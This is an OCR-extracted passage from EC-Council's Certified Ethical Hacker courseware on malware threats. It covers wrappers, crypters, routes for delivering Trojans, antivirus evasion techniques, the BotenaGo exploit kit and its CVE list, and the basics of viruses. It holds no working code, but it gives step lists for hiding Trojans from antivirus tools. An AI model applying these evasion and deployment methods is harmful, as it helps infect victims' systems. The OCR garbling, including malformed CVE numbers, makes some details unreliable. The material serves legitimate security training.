lExpress Wizard lExpress Wizard is a wrapper program that guides the user to create a self-extracting package that can automatically install the embedded setup files, Trojans, etc. IExpress can remove the setup files after execution and thus erase traces of Trojans. Then, it can run a program or only extract hidden files. Such embedded Trojans cannot be detected by antivirus software. lexpress Wizard

x

Welcome to [Express 2.0 This wizard will help you create a self-extracting/ seffinstaling package First, you need to create a Self Extraction Directive (SED) fle to store information about your package. f you have already done this, select Open existing one: otherwise, select Create New Self Extraction Directive file.

@ Create new Sef Extraction Directive file. © Open existing Se Extraction Directive file:

cos [Ties] coe Figure 7.28: Screenshot of IExpress Wizard

Some additional wrapper tools are as follows: =

eLiTeWrap

=

Exe2vbs

=

Advanced File Joiner

=

Kriptomatik

=

Soprano 3

Module 07 Page 1007

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Employing a Crypter ©

CE H

Crypter is software used by hackers to hide viruses, keyloggers or tools in any kind of file, so that they do not easily get detected by antiviruses

BitCrypter

Bitcrypter

Crypters

BitCrypter can be used

@ SwayzCryptor

32-bit executables and .NET apps without affecting their direct functionality

© Snip3

to encrypt and compress

@ Babadeda © Aegis Crypter 2.0 @ Hidden Sight Crypter © Battleship Crypter served. Reproduction

Employing a Crypter A crypter is a software that encrypts the original binary code of the .exe file. Attackers use crypters to hide viruses, spyware, keyloggers, RATs, etc., to make them undetectable by antivirus software. Some crypters that one can use to prevent malicious programs from being detected by security mechanisms are as follows. =

BitCrypter

Source: https://www.crypter.com BitCrypter can be used to encrypt and compress 32-bit executables and .NET apps without affecting their direct functionality. A Trojan or malicious software piece can be encrypted into legitimate software to bypass firewalls and antivirus software. BitCrypter supports a wide range of OS, from Windows XP to the latest Windows 10.

Module 07 Page 1008

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

Figure 7.29: Screenshot of BitCrypter

Some additional crypter tools are as follows: =

SwayzCryptor

Hidden Sight Crypter

=

Snip3

Battleship Crypter

=

Babadeda

HEAVEN CRYPTER

=

Aegis Crypter 2.0

Cypherx

Module 07 Page 1009

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Propagating and Deploying a Trojan Deploy a Trojan through Emails

|

Major Trojan Attack Paths:

© User clicks on the malicious link

© User opens malicious email attachments

Apple Store Ecoanaente

The Trojan connects to the attack server

Dear Customs Link to Trojan Server Towew he mostupto-dte Apple Onna Store ere, vatsasoreon

Youcan a contact Apple Stare Customer Serica 1-810-576-2775 eit ee

Victim

clicks the link and immediately connects to Trojan server

*

infecting his machine

‘Attacker sends an email to victim

Internet

Trojan is sent to the victim

Propagating and Deploying a Trojan (Cont’d)

CE H

Deploy a Trojan through Covert Channels

@ Attackers use covert channels to deploy and hide malicious Trojans in an undetectable protocol @ Covert channels operate on a tunneling method and are mostly employed by attackers to evade firewalls that are deployed in the target network

@ Attackers can create covert channels using various tools such as Ghost Tunnel V2, ElectricFish, and Bachosens Trojan Covert Channel through TCP/UDP

> q Attacker

Module 07 Page 1010

Malicious Server

Firewall

v

Target Server

Attack Target Services

Ethical Hacking and Countermeasures Copyright © by E6-COl All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CEH

Propagating and Deploying a Trojan (Cont’d) Deploy a Trojan through Proxy Servers ‘@

Attackers compromise several computers using a Trojan proxy and

start using them as hidden proxy servers

@ The attackers have full control over the proxy victim’s systemsand can launch attacks on other systems from an affected user’s network ‘@

Attackers use this to anonymously propagate and deploy the Trojan on to the target computer

@

Ifthe authorities detect illegal activity, the footprints lead to innocent users

‘@

Thousands of machines on the Internet are infected with proxy servers

ae ae

3

Compromised Proxy Servers

Internet

in?

Target Company

CEH

Propagating and Deploying a Trojan (Cont’d) Deploy a Trojan through USB/Flash Drives

|| |@ Attackers drop the USB drives on the pathway and wait for random victims to pick them up | | | |@ Once the USB drive is picked up and inserted in the target system by the innocent victim, the Trojan is propagated onto the system and is automatically executed, thus infecting and compromising the system and network

L

4

Malicious Server

[2]

‘Attacker

Malicious USB

e

Victim Finds USB

Module 07 Page 1011

:z a

=

Inserts USB

war

-z

=} >

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Propagating and Deploying a Trojan (Cont'd)

CE H

Techniques for Evading Antivirus Software

@ Break the Trojan file into multiple pieces and zip them as a single file @ ALWAYS write your own Trojan, and embed it into an application @ Change the Trojan’s syntax:

@ Convertan EXE to VB script © Change .EXE extension to .DOC.EXE, .PPT.EXE or .PDF.EXE (Windows hides “known extensions”by default, so it shows up only as .DOC, .PPT and .PDF)

@ Change the content of the Trojan using hex editor and also change the checksum and encrypt the file ‘@

Never use Trojans downloaded from the web (antivirus can detect these easily)

Propagating and Deploying a Trojan After creating a Trojan and employing a dropper/downloader, wrapper, and crypter, the attacker must transfer the package and deploy it on the target machine. The attacker can use the following techniques to propagate the Trojan package to the target machine: =

Deploy a Trojan through emails

=

Deploy a Trojan through covert channels

=

Deploy a Trojan through proxy servers

=

Deploy a Trojan through USB/flash Drives

Deploy a Trojan through Emails

A Trojan is the means by which an attacker can gain access to the victim's system. To gain control over the victim's machine, the attacker creates a Trojan server and then sends an email that lures the victim into clicking on a link provided within the email. As soon as the victim clicks the malicious link sent by the attacker, it connects directly to the Trojan server. The Trojan server then sends a Trojan to the victim system, which undergoes automatic installation on the victim’s machine and infects it. As a result, the victim’s device establishes a connection with the attack server unknowingly. Once the victim connects to the attacker's server, the attacker can take complete control of the victim’s system and perform any action. If the victim carries out an online transaction or purchase, then the attacker can easily steal sensitive information such as the victim’s credit card details and account information. In addition, the attacker can use the victim's machine to launch attacks on other systems. The Trojan may infect computers when users open an email attachment that installs the Trojan on their computers, which might serve as a backdoor for criminals to access the system later. Module 07 Page 1012

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Major Trojan Attack Paths:

© User clickson the malicious link © User opens malicious email attachments

Attacker Attacker installs

the Trojan, infecting his

.

Trojan Server

Figure 7.30: Propagating and deploying Trojan through email

Deploy a Trojan through Covert Channels “Overt” refers to something explicit, obvious, or evident, whereas “covert” refers to something secret, concealed, or hidden.

An overt channel is a legal channel for the transfer of data or information in a company network, and it works securely to transfer data and information. On the contrary, a covert channel is an illegal, hidden path used to transfer data from a network. The table below lists the primary differences between overt and covert channels:

Overt Channel

Covert Channel

A legitimate communication path within a computer system or

A channel that transfers information within a computer system or network in a way that

Its idle components can be exploited to create a covert channel

An example of a covert channel is the communication between a Trojan and its command-and-control center

network for the transfer of data

violates the security policy

Table 7.2: Comparison between the overt channel and covert channel

Covert channels are methods used by attackers to deploy and hide malicious Trojans in an undetectable protocol. They rely on a technique called tunneling, which enables one protocol to transmit over the other. This makes it an attractive mode of transmission for a Trojan, because an attacker can use the covert channel to install a backdoor on the target machine. Covert channels are mostly employed by attackers to evade antivirus scanners and firewalls deployed in the target network. Attackers can create covert channels using various tools such as Ghost Tunnel V2, ElectricFish, and Bachosens Trojan. These tools enable attackers to create covert tunnels with protocols such as DNS, SSH, ICMP, and HTTP/S, to deploy Trojans and perform data exfiltration.

Module 07 Page 1013 :

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Covert Channel through TCP/UDP

Leone E Attacker

>(-Jex ee > V3

Malicious Server

_Firewalll

Target Server

Attack Target Services

Figure 7.31: Propagating and deploying Trojan through covert channels

Deploy a Trojan through Proxy Servers A Trojan

proxy is usually a standalone application that allows remote attackers to use the

victim’s computer as a proxy to connect to the target machine. Attackers compromise several computers and start using them as hidden proxy servers. Attackers have full control over the proxy victim’s system and can launch attacks on other systems in the affected user’s network. Attackers use this strategy to anonymously propagate and deploy the Trojan on the target computer. If the authorities detect illegal activity, the footprints lead to innocent users and not to the attackers, potentially resulting in legal hassles for the victims, who are ostensibly responsible for their network or any attacks launched from them. Thousands of machines on the Internet are infected with proxy servers. Attackers can also employ proxy server Trojans such as Linux.Proxy.10, Proxy Trojan, or Pinkslipbot (Qbot), which can automatically create proxies and be used to perform malicious activities.

Attacker

Compromised Proxy Servers

Internet

Target Company

Figure 7.32: Propagating and deploying Trojan through proxy servers

Deploy a Trojan through USB/Flash Drives An attacker can also transfer the Trojan package onto a USB drive and trick the victim into using the USB drive on the target system. Sometimes, attackers just drop a USB drive and wait for a random victim to pick it up. Once the USB drive is picked up and inserted into the target system by the innocent victim, the Trojan is propagated on the system by the drop or download method, depending on the type of packaging technique used by the attacker. After propagating to the victim’s machine, the Trojan is automatically executed on the target system, thereby infecting and compromising the system and network. Malicious Server

Attacker

Drops

Malicious USB

Victim

Finds USB

Inserts USB in system

Drop and Execute Trojan

Compromise Victim’s System

Figure 7.33: Propagating and deploying Trojan through USB

Module 07 Page 1014

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Techniques for Evading Antivirus Software Sometimes, various types of antivirus scanners are deployed in the target network, and these antivirus scanners do not allow the propagation or deployment of random or malicious packages. Hence, propagating and deploying a Trojan stealthily is one of the important tasks of an attacker. The various techniques that can be used by attackers to make malware such as Trojans, viruses, and worms undetectable by antivirus applications are listed below. 1.

Break the Trojan file into multiple pieces and zip them as a single file.

2.

Always write your Trojan and embed it into an application (an antivirus program fails to recognize new Trojans, as its database does not contain the proper signatures). Change the Trojan’s syntax: o

Convert an EXE to VB script

o

Change the .EXE extension to .DOC, .EXE, .PPT, .EXE, or .PDF.EXE (Windows hides “known extensions” by default; hence, it shows up only as .DOC, .PPT, .PDF, etc.)

enous

Change the content of the Trojan using a hex editor. Change the checksum and encrypt the file. Never use Trojans downloaded from the web (antivirus software detects these easily). Use binder and splitter tools that can change the first few bytes of the Trojan programs. Perform code obfuscation or morphing. Morphing is done to prevent program from differentiating between malicious and harmless programs.

Module 07 Page 1015

the

antivirus

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Exploit Kits

CE H

@ Anexploitkit or crimeware toolkitis a platformto deliver exploits and payloads such as Trojans, spywares, backdoors, bots, and buffer overflow scripts to the target system

@ Exploitkits come with pre-written exploit codes and therefore can be easily used by an attacker, who is not an IT or security expert

Legitimate

fz Legitimate Website

Compromised Web Server Exploit kit gathers information on the victit and delivers the exploit

te aeserverra hosting the exploit pack landing page

Exploit Kits (Cont’d) BotenaGo jotenaGo

op

=

(a —

Exploit Kit Exploit Pack Server _ Landing Page

CEH

@ The BotenaGo exploit kit written in the Go scripting language contains over 30 variants of exploits, | which make it capable of attacking millions of loT and routing devices worldwide @ Using BotenaGo, attackers initiate the exploitation process by droppinga backdoor into the victim's device through port 31412

Exploit Kits Lord

Underminer Exploit kit RIG Exploit kit

Magnitude Angler Neutrino

Sundown

—=

| || | || | || | || | ] B | || | || | || | || | ||



1 ||

) bance vedo aoe i ise ae

|| ||

|| | ||

secrty vente on

|| ||

|| ||

| Al Rights Reserved, Reproduction i

Exploit Kits An exploit kit or crimeware toolkit is used to exploit security loopholes found in software applications such as Adobe Reader and Adobe Flash Player, by distributing malware such as spyware, viruses, Trojans, worms, bots, backdoors, buffer overflow scripts, or other payloads to the target system. Exploit kits come with pre-written exploit code. Thus, they are easy to use for an attacker who is not an IT or security expert. They also provide a user-friendly interface to track the infection statistics as well as a remote mechanism to control the compromised Module 07 Page 1016

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

system. Using exploits kits, an attacker can target browsers, programs that are accessible using browsers, zero-day vulnerabilities, and exploits updated with new patches instantly. Exploit kits are used against users running insecure or outdated software applications on their systems. Legitimate website hosted

on compromised web server Victim

Legitimat

>| .

‘we site re

Compromised

jepsite

r

Web Server

Exploit kit gathers

information on the victim and delivers the exploit

server hosting the exploit pack landing page

Exploit Kit Server

Exploit Pack Landing Page

Figure 7.34: Process of exploitation using exploit kits

The diagram above shows the general procedure for an exploit kit; the process of exploiting a machine might vary depending on the exploit kit used: =

The victim visits a legitimate website that is hosted on the compromised web server.

=

The victim is redirected through various intermediary servers.

=

The victim unknowingly lands on an exploit kit server hosting the exploit pack landing

=

The exploit kit gathers information on the victim, based on which exploit and delivers it to the victim’s system.

=

If the exploit succeeds, a malware program is downloaded and executed on the victim’s

page.

it determines the

system.

Exploit Kits =

BotenaGo Exploit Kit

The BotenaGo exploit kit written in the Go scripting language contains over 30 variants of exploits and is cable of attacking millions of loT and routing devices worldwide. BotenaGo was first discovered in November 2021 and observed as Mirai botnet malware by antivirus software. Using BotenaGo, attackers initiate the exploitation process by placing a backdoor in the victim device through port 31412 by sending a GET request and listens for the victim IP as the response through port 19412. After successfully embedding a backdoor in the victim device, attackers can explore the device using exploit functions that are preconfigured in the source code. BotenaGo is successfully being used by attackers in distributing DDoS functionalities by spreading payloads to victim devices.

Module 07 Page 1017 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Features:

o

No active communication with the command-and-control unit during exploitation

o

Exploits based on exploitation function mapping

o

Exploits up to 33 vulnerabilities in the initialization phase

co

Launches Mirai malware on the victim device through links

The table below lists some of the vulnerabilities that can be exploited by BotenaGo. Vulnerability

Affected devices

CVE-20208515

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4 Beta devices

CVE-20152051

D-Link DIR-645 Wired/Wireless Router Rev. Ax with firmware 1.04b12 and earlier

CVE-20161555

Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0

aaa

NETGEAR DGN2200 devices with firmware version 10.0.0.50

CVE-20166277

NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta,

CVE-201810561, CVE2018-10562

R8000 before 1.0.3.26.Beta, D6220, D6400, D7000 | GPON

home routers

CVE-20133307

. . Linksys X3000 1.0.03 build 001

CVE-20209377

. D-Link DIR-610

CVE-201611021

. . D-Link DCS-930L devices before 2.12

CVE-201810088

. . XiongMai uc-httpd 1.0.0

Vulnerability

Affected devices

aoe

Comtrend VR-3033 DE11-416SSG-C01_R02.A2pvl042j1.d26m

CVE-20135223

. D-Link DSL-2760U Gateway

Module 07 Page 1018

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CVE-20208958

Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024

CVE-201919824

TOTOLINK Realtek SDK based routers; this affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.

CVE-202010987

. Tenda AC15 AC1900 version 15.03.05.19

CVE-20209054

Multiple ZyXEL network-attached storage (NAS) devices running firmware version 5.2; affected products include NAS326 before firmware V5.21(AAZF.7)CO, NAS520 before firmware V5.21(AASZ.3)CO, NAS540 before firmware V5.21(AATB.4)CO, NAS542 before firmware V5.21(ABAG.4)CO; ZyXEL has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices; affected models that are at end-of-support are NSA210, NSA220, NSA220+, NSA221, NSA310,

NSA310S, NSA320, NSA320S, NSA325, and NSA325v2

CVE-2017-

18368 CVE-2014-

2321

ea

ZyXEL P660HN-T1A v1 TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31 router

distributed by TrueOnline ZTE F460 and F660 cable modems

NETGEAR DGN2200 devices with firmware version 10.0.0.50 Table 7.3: CVEs for the BotenaGo exploit kit

A -™

© 4 securty vendors

flagged this this fil eas

malicious

A

c2fer4d2edb260614d5azte90cc4c142

DETECTION

DETAILS

RELATIONS

= CONTENT

-—SUBMISSIONS

COMMUNITY

‘Security vendors’ analysis on

undetected

Ad-Aware

D)

Underecte:

Figure 7.35: Screenshot of RIG Exploit Kit

Module 07 Page 1019

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

The following are some additional exploit kits that attackers can use to propagate and deploy Trojans: =

Lord

=

Angler

=

Underminer Exploit Kit

=

Neutrino

=

RIG Exploit kit

=

Terror

=

Magnitude

=

Sundown

Module 07 Page 1020

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

CEH

LO#04: Explain Viruses and Worm, Their Types, and How They Infect Files

Copyright © by

Al RightsReserved, Reproduction

i Strictly Prohibited.

Virus and Worm Concepts This section introduces you to various concepts related to viruses and worms. In addition, it discusses the life stages of a virus and the working of a virus. It also explores why people create computer viruses, indications of a virus attack, virus hoaxes, fake antivirus tools, and

ransomware.

Furthermore, it highlights different types of viruses, categorized by their origin, techniques used to infect target systems, the types of files they infect, where they hide, the sort of damage they cause, the type of OS they work on, and so on. It also deals with computer worms, discusses the difference between worms and viruses, and explores worm makers.

Module 07 Page 1021 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Introduction to Viruses

CE H

@ A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector or document

@ Viruses are generally transmitted through file downloads, infected disk/flash drives, and as email attachments @ Indications of a virus attackinclude constant antivirus alerts, suspicious hard drive activity, lack of storage space, unwanted pop-up windows, etc. Characteristics of Viruses

© Infect other programs © Transform themselves ©

Encryptthemselves

& Alterdata

and programs © Corruptfiles © Self-replicate

Purpose of Creating Viruses

Inflict damage on competitors Financial benefits Vandalism Play pranks

Research projects

Cyber terrorism

Distribute political messages

Damage networksor computers Gain remote access toa victim’s computer

Introduction to Viruses Viruses are the scourge of modern computing. Computer viruses have the potential to wreak havoc on both business and personal computers. The lifetime of a virus depends on its ability to reproduce itself. Therefore, attackers design every virus code such that the virus replicates itself n times. A computer virus is a self-replicating program that produces its code by attaching copies of itself to other executable code and operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files; however, viruses can infect external machines only with the assistance of computer users. Some viruses affect computers as soon as their code is executed; other viruses remain dormant until a pre-determined logical circumstance is met. Viruses infect a variety of files, such as overlay files (.OVL) and executable files (.EXE, SYS, .COM, or .BAT). They are transmitted through file downloads, infected disk/flash drives, and email attachments.

Characteristics of Viruses The performance of a computer is affected by a virus infection. This infection can lead to data loss, system crash, and file corruption. Some of the characteristics of a virus are as follows: =

Infects other programs

=

Transforms itself

=

Encrypts itself

=

Alters data

Module 07 Page 1022

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Corrupts files and programs

=

Replicates itself

Purpose of Creating Viruses

Attackers create viruses with disreputable motives. Criminals create viruses to destroy a company’s data, as an act of vandalism, or to destroy a company’s products; however, in some cases, viruses aid the system. An attacker creates a virus for the following purposes: =

Inflict damage on competitors

=

Realize financial benefits

=

Vandalize intellectual property

=

Play pranks

=

Conduct research

=

Engage in cyber-terrorism

=

Distribute political messages

=

Damage network or computers

=

Gain remote access to the victim's computer

Indications of Virus Attack Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a virus by interrupting the regular flow of a process or a program. However, not all bugs created contribute toward attacking the system; they may be merely false positives. For example, if the system runs slower than usual, one may assume that a virus has infected the system; however, the actual reason might be program overload. An effective virus tends to multiply rapidly and may infect some machines in a short period. Viruses can infect files on the system, and when such files are transferred, they can infect machines of other users who receive them. A virus can also use file servers to infect files. When a virus infects a computer, the victim or user will be able to identify some indications of the presence of virus infection. Some indications of computer virus infection are as follows: =

Processes require more resources and time, resulting in degraded performance

=

Computer beeps with no display

=

Drive label changes and OS does not load

=

Constant antivirus alerts

=

Computer freezes frequently or encounters an error such as BSOD

=

Files and folders are missing

Module 07 Page 1023

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

=

Suspicious hard drive activity

=

Browser window “freezes”

=

Lack of storage space

=

Unwanted advertisements and pop-up windows

Module 07 Page 1024

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

C'EH

Stages of Virus Lifecycle Design Replication Launch Detection

Incorporation

Execution of the damage routine

| Developing virus code using programming languages or construction kits | Virus replicates itself for a period within the target system and then spreads itself | It gets activated when the user performs certain actions such as running infected programs | Avirusis identified as a threat infecting target systems

| Antivirus software developers assimilate defenses against the virus

the virus threats and eliminate | Users install antivirus updates

Stages of Virus Lifecycle The virus lifecycle includes the following six stages from origin to elimination. 1.

Design: Development of virus code using programming languages or construction kits.

2.

Replication: The virus replicates for a period within the target system and then spreads itself.

3.

Launch: The virus is activated when the user performs specific actions such as running an infected program.

4.

Detection: The virus is identified as a threat infecting target system.

5.

Incorporation: Antivirus software developers assimilate defenses against the virus.

6.

Execution of the damage routine: Users install antivirus updates and eliminate the virus threats.

Module 07 Page 1025

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Working of Viruses

C iE H

Infection Phase ‘@

Attack Phase

Inthe infection phase, the virus replicates itself and

‘@ Viruses are programmed with trigger events to

activate and corrupt systems

attaches to a .exe file in the system Before

After

Infection

Infection

-EXE File

-EXE File

File Header Cp

File Header TP Jeot

‘Start of Program|

aad

gefep Start of Program

End of Progam

lean

‘@

End of Program rx!

infect only when a certain predefined condition ismet

such as a user’s specifictask, a day, time, or a specific event

Unfragmented File Before Attack i B File: ile: A File: den

Page: 1, Page:2 ee z

Page:2

Page:3

o Fragmented Due to Virus Attack File

Virus Infected File

ne

Some viruses infect each time they are run, and others

Page:1 File:A

Page:1 | Page:3.—«Page:2_—-Page:2 Page:3 File:BFile:B File:A_—File:B_—File:A

x

Working of Viruses Viruses can attack a target host’s system using a variety of methods. They can attach themselves to programs and transmit themselves to other programs through specific events. Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit themselves using non-executable files. “Trigger” and “direct attack” events can cause a virus to activate and infect the target system when the user triggers attachments received through email, websites, malicious advertisements, flashcards, pop-ups, and so on. The virus can then attack the system’s built-in programs, antivirus software, data files, system startup settings, etc.

Viruses have two phases: the infection phase and the attack phase.

=

Infection Phase Programs modified by a virus infection can enable virus functionalities to run on the system. The virus infects the target system after it is triggered and becomes active upon the execution of infected programs, because the program code leads to the virus code. The two most important factors in the infection phase of a virus are as follows: o

Method of infection

o

Method of spreading

A virus infects a system in the following sequence: o.

The virus loads itself into memory and checks for an executable on the disk.

o

The virus appends malicious code to a legitimate program without the permission or knowledge of the user.

oO.

The user is unaware of the replacement and launches the infected program.

Module 07 Page 1026

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

o

The execution of the infected program also infects other programs in the system.

o

The above cycle continues

system.

until the user realizes that there is an anomaly

in the

Apparently, the user unknowingly triggers and executes the virus for it to function. There are many ways to execute programs while the computer is running. For example, if the user installs any software tool, the setup program calls various built-in subprograms during extraction. If a virus program already exists, it can be activated with this type of execution, and the virus can also infect additional setup programs. Specific viruses infect in different ways, such as o A

o

file virus infects by attaching itself to an executable system application program. Potential targets for virus infections are as follows: e

Source code

¢

Batch files

©

Script files

Boot sector viruses execute their code before the target PC is booted.

Viruses spread in a variety of ways. There are virus programs that infect and keep spreading every time the user executes them. Some virus programs do not infect programs when first executed. They reside in a computer’s memory and infect programs later. Such virus programs wait for a specified trigger event to spread at a later stage. Therefore, it is difficult to recognize which event might trigger the execution of a dormant virus. As illustrated in the figure below, the .EXE file’s header, when triggered, executes and starts running the application. Once this file is infected, any trigger event from the file’s header can activate the virus code along with the application program immediately after executing it. The most popular methods by which a virus spreads are as follows: o.

Infected files: A virus can infect a variety of files.

o.

File-sharing services: A virus can take advantage of file servers to infect files. When unsuspecting users open the infected files, their machines also become infected.

o

DVDs and other storage media: When infected storage media such as DVDs, flash drives, and portable hard disks are inserted into a clean system, the system gets infected.

©

Malicious attachments and downloads: A virus spreads if a malicious attachment sent via email is opened or when apps are downloaded from untrusted sources.

Module 07 Page 1027 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

Before Infection

After Infection

-EXE File

{ sOXE

File Header

File Header

IP

IP

4...) Dd start of Program|

L_J Clean File

&

z77}p Startof Program

End of Program|

Virus Jump

End of Program

=>":

{

Virus Infected File

Figure 7.36: Infection Phase

=

Attack Phase Once viruses spread throughout the target system, they start corrupting the files and programs of the host system. Some viruses can trigger and corrupt the host system only after the triggering event is activated. Some viruses have bugs that replicate themselves and perform activities such as deleting files and increasing session time. Viruses corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform the following actions: o.

Delete files and alter the content of data files, slowing down the system

o

Perform tasks animations

not

related

to applications,

such

as playing

music

and

creating

Unfragmented File Before Attack File: B

File: A

Page:1

Page:2_—sPage:3

File Fragmented Due to Virus Attack

Figure 7.37: Attack Phase

The figure shows two files, A and B. Before the attack, the two files are located one after the other in an orderly manner. Once a virus code infects the file, it alters the position of the files placed consecutively, leading to inaccuracy in file allocations and causing the Module 07 Page 1028

Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

system to slow down as the user tries to retrieve the files. In the attack phase: o

Viruses execute upon triggering specific events

o

Some viruses execute and corrupt via built-in bug programs after being stored in the host’s memory

©

The latest and most advanced viruses conceal their presence, attacking only after thoroughly spreading through the host

Module 07 Page 1029 :

Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures

Exam 312-50 Certified Ethical Hacker

Malware Threats

How does a Computer

1]

.

Get Infected by Viruses?

. the latest antivirus application Not running

When a user accepts files and downloads without properly checkingthe source

Opening infected e-mail attachments

B

Installing pirated software

Not updating and not installing new versions of plug-ins

|

CE H

Clicking malicious online ads

Using portable media

8 |

.

Connecting to untrusted networks Copyright © by

How does a Computer Get Infected by Viruses? To infect a system, first,

a virus has to enter it. Once the user downloads and installs the virus

from any source and in any form, it replicates itself to other programs. Then, the virus can infect the computer in various ways, some of which are listed below: Downloads: Attackers incorporate viruses in popular software programs and upload them to websites intended for download. When a user unknowingly downloads this infected software and installs it, the system is infected. Email attachments: Attackers usually send virus-infected files as email attachments to spread the virus on the victim’s system. When the victim opens the malicious attachment, the virus automatically infects the system. Pirated software:

Installing cracked versions of software

(OS, Adobe,

Microsoft Office,

etc.) might infect the system as they may contain viruses. Failing to install security software: With the increase in security parameters, attackers are designing new viruses. Failing to install the latest antivirus software or regularly update it may expose the computer system to virus attacks. Updating software: If patches are not regularly installed when released by vendors, viruses might exploit vulnerabilities, thereby allowing an attacker to access the system. Browser: By default, every browser comes with built-in security. An incorrectly configured browser could result in the automatic running of scripts, which may, in turn, allow viruses to enter the system. Firewall: Disabling the firewall will compromise the security of network traffic and invite viruses to infect the system. Module 07 Page 1030

Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Malware Threats

Exam 312-50 Certified Ethical Hacker

=

Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden behind the pop-up enters the system. Whenever the user turns on the system, the installed virus code will run in the background.

=

Removable media: When a healthy system is associated with virus-infected removable media (e.g., CD/ DVD, USB drive, card reader), the virus spreads the system.

=

Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or permitting a file sharing program that is accessed openly will allow a virus to take over the device.

=

Backup and restore: Taking a backup of an infected file and restoring it to a system infects the system again with the same virus.

=

